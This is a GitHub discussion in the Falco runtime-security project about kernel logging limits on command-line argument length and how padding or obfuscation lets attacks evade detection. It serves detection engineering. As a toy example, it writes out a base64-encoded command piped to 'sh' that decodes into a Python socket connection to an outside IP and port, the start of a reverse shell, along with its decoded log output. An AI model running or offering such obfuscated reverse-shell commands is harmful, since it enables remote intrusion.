[Discussion] Robust kernel event logging for variable length strings for threat detection use cases (e.g. cmd args padding obfuscation bypasses etc) #2259

incertum · 2022-10-16T04:01:27Z

Falco enforces upper limits on variable length strings for kernel signals such as cmd args, process environment variables or file names and paths. The primary motivation is to ensure stability in terms of maximum overall event size and maximum field size.

Across tools (including Falco) there are two commonly adopted approaches to for example read cmd args:

read each cmd arg individually and truncate at the end according to Falco's max arg size (if applicable)
read all cmd args in one pass from start to end and truncate at the end according to Falco's max args size (if applicable)

The limits enforced by Falco and other tools are typically smaller than the limits enforced by the Linux kernel. The current approach Falco is using is battle proven in production (significant performance and stability benefits) while being robust for >99% of benign cmd args.

However, none of the current approaches is robust to cmd args padding obfuscation bypasses in "command line attacks" - payload not invoked over file or similar. Therefore, kicking off a discussion around how critical edge cases could be supported in future iterations of Falco (if even possible and feasible). More details and example are provided in additional comments below.

One idea could be to feature more sophisticated variable length strings logging only for the most critical threat detection use cases, such as when a string gets interpreted through the -c flag. Linux kernel limits likely are rather high and would introduce unnecessary instability. Perhaps some sort of probabilistic sampling of the string at the beginning, middle and end and pushing 3 substrings to userspace that have an upper limit may be worth thinking about? A slight probabilistic approach may help reduce the likelihood of threat actors being able to reliably test bypasses against Falco (attacks often require multiple attempts because of app and system flakiness). However, any approach will have a performance impact and the required refactor may be significant.

Other relevant logging improvements / optimization ideas that have been raised are related to this issue:

TOCTOU and LSM hooks Support Linux Security Modules hook for more accurate security tracing libs#252 @LucaGuerra @loresuso
More robust "drop+exec" (file-based) and "memfd+exec" detections [TRACKING] "drop+exec" kernel signal correlations detections + threat modeling beyond libs#615 @loresuso @LucaGuerra @incertum
Interpreter scripts [FEATURE] Options available for tapping into "linux_binprm" that holds args used when loading binaries libs#621 @incertum
File path obfuscation Discuss about fundamental solution of detecting symlink file based bypass method #2203 @hi120ki
Additional syscall logging [UMBRELLA] Missing syscalls #1998 @Andreagit97 @FedeDP

Looking forward to collect more thoughts from everyone 🙃

The text was updated successfully, but these errors were encountered:

incertum · 2022-10-16T04:16:35Z

Exploiting applications over "command line attacks" often results in some sort of sh -c on the backend. This means bash interprets the entirety of the passed string and the good news is that in this case the payload is logged as cmd args to the execve* syscall while preserving the original semantic meaning of the entire payload in the same log. Afterwards, the overall semantic meaning is typically destroyed after the payload is being interpreted - often making it more difficult to spot obvious outliers.

Consider a simple toy example (using Falco lib's sinsp-example binary for simple and fast experiments):

sudo ./libsinsp/examples/sinsp-example -b driver/bpf/probe.o -f "evt.dir=< and (evt.type=execve or evt.type=execveat)" -o "*%proc.name %proc.exepath %proc.cmdline"

[1]

/bin/bash -c "echo \"cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNv
Y2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMC4wLjEiLDEy
MzQpKScK\" | base64 --decode | sh"

{"proc.cmdline":"bash -c echo \"cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNv\nY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMC4wLjEiLDEy\nMzQpKScK\" | base64 --decode | sh","proc.exepath":"/bin/bash","proc.name":"bash"}
{"proc.cmdline":"base64 --decode","proc.exepath":"/usr/bin/base64","proc.name":"base64"}
{"proc.cmdline":"sh","proc.exepath":"/usr/bin/sh","proc.name":"sh"}
{"proc.cmdline":"python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234))","proc.exepath":"/usr/bin/python","proc.name":"python"}

[2]

Because of the Turing completeness of interpreters there are absolutely no limits in terms of obfuscating suspicious substrings in [1] and making sure that they are not being logged as part of an execve* event. One fair argument is to simply say we don't care, there surely will be some other evidence in Falco somewhere. In practice, noisy environment can however make it hard to reliably detect those and explainability of what actually happened is also greatly reduced. Being able to catch the malicious payload invocation is typically the preferred and fastest detection.

For simplicity extended the following scripts based on this post in order to easily experiment with possible cmd args logging improvements.

Launch logging

sudo ./libsinsp/examples/sinsp-example -b driver/bpf/probe.o -f "evt.dir=< and (evt.type=execve or evt.type=execveat)" -o "*%proc.name %proc.exepath %proc.cmdline"

Then launch the test.sh script and examine logging outputs.

foo

#!/bin/bash
/bin/bash -c 'echo -n "$1"; echo -n "$2"; echo -n "$3"';
echo -n "$1" | wc -c

test.sh

#!/bin/bash

SIZE=1000
while [ $SIZE -lt 300000 ]
do
   SIZE_HALF=$(expr $SIZE / 2)
   echo "SIZE $SIZE, SIZE_HALF $SIZE_HALF"
   VAR="`head -c $SIZE_HALF < /dev/zero | tr '\0' 'a'`"
   VAR="$VAR`head -c $SIZE_HALF < /dev/zero | tr '\0' 'A'`"

   VAR2="`head -c $SIZE_HALF < /dev/zero | tr '\0' 'b'`"
   VAR2="$VAR2`head -c $SIZE_HALF < /dev/zero | tr '\0' 'B'`"

   VAR3="`head -c $SIZE_HALF < /dev/zero | tr '\0' 'c'`"
   VAR3="$VAR3`head -c $SIZE_HALF < /dev/zero | tr '\0' 'C'`"

   ./foo "$VAR" "$VAR2" "$VAR3"
   let SIZE="( $SIZE * 20 ) / 19"
done

incertum · 2022-12-20T01:08:10Z

This is a more advanced optimization. I think a lot of other things have to happen first before tackling this, but let's keep it on the radar.

poiana · 2023-03-20T03:58:27Z

Issues go stale after 90d of inactivity.

Mark the issue as fresh with /remove-lifecycle stale.

Stale issues rot after an additional 30d of inactivity and eventually close.

If this issue is safe to close now please do so with /close.

Provide feedback via https://github.com/falcosecurity/community.

/lifecycle stale

incertum · 2023-03-20T07:00:26Z

/remove-lifecycle stale

poiana · 2023-06-18T07:31:18Z

Issues go stale after 90d of inactivity.

Mark the issue as fresh with /remove-lifecycle stale.

Stale issues rot after an additional 30d of inactivity and eventually close.

If this issue is safe to close now please do so with /close.

Provide feedback via https://github.com/falcosecurity/community.

/lifecycle stale

poiana · 2023-07-18T07:32:07Z

Stale issues rot after 30d of inactivity.

Mark the issue as fresh with /remove-lifecycle rotten.

Rotten issues close after an additional 30d of inactivity.

If this issue is safe to close now please do so with /close.

Provide feedback via https://github.com/falcosecurity/community.

/lifecycle rotten

poiana · 2023-08-17T07:32:56Z

Rotten issues close after 30d of inactivity.

Reopen the issue with /reopen.

Mark the issue as fresh with /remove-lifecycle rotten.

Provide feedback via https://github.com/falcosecurity/community.
/close

poiana · 2023-08-17T07:32:59Z

@poiana: Closing this issue.

In response to this:

Rotten issues close after 30d of inactivity.

Reopen the issue with /reopen.

Mark the issue as fresh with /remove-lifecycle rotten.

Provide feedback via https://github.com/falcosecurity/community.
/close

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

incertum added the kind/feature label Oct 16, 2022

incertum mentioned this issue Oct 16, 2022

update(modern_bpf): reduce the execve instrumentation time with new APIs falcosecurity/libs#648

Merged

incertum mentioned this issue Jan 27, 2023

Trigger alert whenever there is any manual command executed inside a container [approx solution via new filter fields proc.is_vpgid_leader or proc.vpgid.exepath or proc.vpgid.name] #2338

Closed

poiana added the lifecycle/stale label Mar 20, 2023

poiana removed the lifecycle/stale label Mar 20, 2023

poiana added the lifecycle/stale label Jun 18, 2023

poiana added lifecycle/rotten and removed lifecycle/stale labels Jul 18, 2023

poiana closed this as completed Aug 17, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Discussion] Robust kernel event logging for variable length strings for threat detection use cases (e.g. cmd args padding obfuscation bypasses etc) #2259

[Discussion] Robust kernel event logging for variable length strings for threat detection use cases (e.g. cmd args padding obfuscation bypasses etc) #2259

incertum commented Oct 16, 2022 •

edited

Loading

incertum commented Oct 16, 2022

incertum commented Dec 20, 2022

poiana commented Mar 20, 2023

incertum commented Mar 20, 2023

poiana commented Jun 18, 2023

poiana commented Jul 18, 2023

poiana commented Aug 17, 2023

poiana commented Aug 17, 2023

[Discussion] Robust kernel event logging for variable length strings for threat detection use cases (e.g. cmd args padding obfuscation bypasses etc) #2259

[Discussion] Robust kernel event logging for variable length strings for threat detection use cases (e.g. cmd args padding obfuscation bypasses etc) #2259

Comments

incertum commented Oct 16, 2022 • edited Loading

incertum commented Oct 16, 2022

incertum commented Dec 20, 2022

poiana commented Mar 20, 2023

incertum commented Mar 20, 2023

poiana commented Jun 18, 2023

poiana commented Jul 18, 2023

poiana commented Aug 17, 2023

poiana commented Aug 17, 2023

incertum commented Oct 16, 2022 •

edited

Loading